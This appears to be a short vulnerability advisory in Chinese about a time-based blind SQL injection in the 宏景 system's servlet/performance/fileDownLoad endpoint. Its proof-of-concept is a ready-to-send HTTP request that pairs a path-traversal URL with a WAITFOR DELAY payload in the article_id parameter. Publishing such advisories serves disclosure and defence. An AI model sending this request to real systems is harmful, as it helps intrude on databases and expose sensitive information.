宏景系统 /templates/attestation/../../servlet/performance/fileDownLoad SQL 注入漏洞

2026-02-25 宏景系统 PoC Public

Description

宏景系统 servlet/performance/fileDownLoad 接口存在SQL时间盲注漏洞,攻击者可通过构造恶意 article_id 参数注入SQL语句,利用 WAITFOR DELAY 实现时间延迟,获取数据库敏感信息,进一步可能导致系统被入侵控制。

PoC

GET /templates/attestation/../../servlet/performance/fileDownLoad?article_id=1%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities